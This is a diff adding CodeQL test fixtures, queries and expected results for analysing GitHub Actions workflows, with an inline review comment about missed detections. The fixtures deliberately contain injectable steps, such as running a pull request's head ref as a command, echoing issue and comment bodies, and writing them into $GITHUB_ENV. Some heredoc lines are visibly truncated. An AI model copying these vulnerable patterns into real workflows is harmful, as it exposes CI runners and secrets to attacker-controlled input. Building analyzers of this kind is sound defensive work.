@@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog< event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat | tee -a $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL | tee -a $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF | tee -a "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') | tee -a $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE< output + - run: python venv/bin/activate.py + - run: echo foo; python venv/bin/activate.py + - run: pnpm run test:ct + - run: pip install nbformat && python scripts/generate_notebooks.py + - run: python scripts/generate_theme.py --outfile js/storybook/theme.css + - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: xvfb-run ./mvnw clean package + - run: echo "foo" && npm i && echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo `npm i` bar" + - run: dotnet test foo/Tests.csproj -c Release + - run: go run foo.go + - run: sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # not supported yet + - run: sed -f ./config.sed file.txt > foo.txt + - run: sed -f config file.txt > foo.txt + - run: echo "foo" | awk -f ./config.awk > foo.txt + - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo + - run: ./foo/cmd + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + 
.github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
diff --git a/actions/ql/test/library-tests/.github/workflows/test.yml b/actions/ql/test/library-tests/.github/workflows/test.yml
new file mode 100644
index 000000000000..754105a49e63
--- /dev/null
+++ b/actions/ql/test/library-tests/.github/workflows/test.yml
@@ -0,0 +1,40 @@
+on: push
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+
+ outputs:
+ job_output: ${{ steps.step.outputs.value }}
+
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ steps.source.outputs.all_changed_files }}
+ find: "foo"
+ replace: ""
+ - id: simplesink1
+ run: echo ${{ steps.source.outputs.all_changed_files }}
+ - id: simplesink2
+ run: ${{ github.event.pull_request.head.ref }}
+
+ job2:
+ runs-on: ubuntu-latest
+
+ if: ${{ always() }}
+
+ needs: job1
+
+ steps:
+ - id: sink
+ run: echo ${{needs.job1.outputs.job_output}}
diff --git a/actions/ql/test/library-tests/Placeholder.expected b/actions/ql/test/library-tests/Placeholder.expected
deleted file mode 100644
index 2a4f078a25fc..000000000000
--- a/actions/ql/test/library-tests/Placeholder.expected
+++ /dev/null
@@ -1 +0,0 @@
-| 1 |
diff --git a/actions/ql/test/library-tests/Placeholder.ql b/actions/ql/test/library-tests/Placeholder.ql
deleted file mode 100644
index 82198eaf87be..000000000000
--- a/actions/ql/test/library-tests/Placeholder.ql
+++ /dev/null
@@ -1 +0,0 @@
-select 1
diff --git a/actions/ql/test/library-tests/commands.expected b/actions/ql/test/library-tests/commands.expected
new file mode 100644
index 000000000000..35305671cf05
--- /dev/null
+++ b/actions/ql/test/library-tests/commands.expected
@@ -0,0 +1,202 @@ +| .github/workflows/commands.yml:15:9:18:6 | Run Step | command1 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | command2 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | command3 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | command4 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | command5 "$(command6)" | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | command6 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | command7 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | command8 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | command9 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | command10 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | command11 "`command12`" | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | command12 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | command13 "`command14` $(date \| wc -l)" | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | command14 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | date | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | wc -l | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | command1 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | command2 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ 
github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | tee -a $GITHUB_OUTPUT | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64) | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | base64 | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | cat status.output.json | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | echo "$(cat status.output.json)" | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | echo "$EOF" | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | echo "status< | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | tee -a $GITHUB_OUTPUT | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | echo "$EOF" | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | echo "response< | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | echo $output | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | tee -a $GITHUB_OUTPUT | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | echo EOF | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | grep -E "*.(tar.gz\|zip)$" | +| 
.github/workflows/multiline2.yml:24:9:30:6 | Run Step | ls | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | tee -a $GITHUB_ENV < | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt < | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat < | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat < | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee 
-a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE< | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | echo EOF | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | echo '$ISSUE' | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | echo 'EOF' | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog< event.json | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:34:9:40:6 | 
Run Step | EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV < | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt < | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo 
"PR_TITLE< foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | echo "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | diff --git a/actions/ql/test/library-tests/commands.ql b/actions/ql/test/library-tests/commands.ql new file mode 100644 index 000000000000..4092ac09d832 --- /dev/null +++ b/actions/ql/test/library-tests/commands.ql @@ -0,0 +1,4 @@ +import actions + +from Run run +select run, run.getScript().getACommand() diff --git a/actions/ql/test/library-tests/poisonable_steps.expected b/actions/ql/test/library-tests/poisonable_steps.expected new file mode 100644 index 000000000000..c93753e8f724 --- /dev/null +++ b/actions/ql/test/library-tests/poisonable_steps.expected 
@@ -0,0 +1,28 @@ +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | 
diff --git a/actions/ql/test/library-tests/poisonable_steps.ql b/actions/ql/test/library-tests/poisonable_steps.ql
new file mode 100644
index 000000000000..1aacdd14d140
--- /dev/null
+++ b/actions/ql/test/library-tests/poisonable_steps.ql
@@ -0,0 +1,5 @@
+import actions
+import codeql.actions.security.PoisonableSteps
+
+from PoisonableStep step
+select step
diff --git a/actions/ql/test/library-tests/test.expected b/actions/ql/test/library-tests/test.expected
new file mode 100644
index 000000000000..a8cf50334ce4
--- /dev/null
+++ b/actions/ql/test/library-tests/test.expected
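Review bot: The poisonable_steps.expected committed with this query flags steps 13–33, 35 and 37–41 of poisonable_steps.yml but not step 34 `dotnet test foo/Tests.csproj -c Release` nor step 7 `venv/bin/activate`, while `go run foo.go` (35) and `./venv/bin/activate` (17) are flagged; `dotnet test` restores and builds the checked-out project, whose MSBuild targets can run arbitrary commands, and a command word containing a slash is executed directly by the shell rather than looked up in PATH, so both look like false negatives unless they are deliberate negative cases. Either way the intent should be written down: above `from PoisonableStep step` add `// Steps whose run: script or uses: action executes content of the checked-out repository; see poisonable_steps.yml for positive cases and intentionally unflagged ones.` and mark the unflagged fixture lines with a `# not supported yet` comment as line 36 (`sed -i ...`) already does. The `PoisonableStep` class is defined outside this diff, so I cannot tell whether `dotnet test` is simply missing from its command list or excluded on purpose.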
@@ -0,0 +1,1741 @@ +files +| .github/workflows/commands.yml:0:0:0:0 | .github/workflows/commands.yml | +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | +| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: 
echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| 
.github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step 
| +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | 
.github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | 
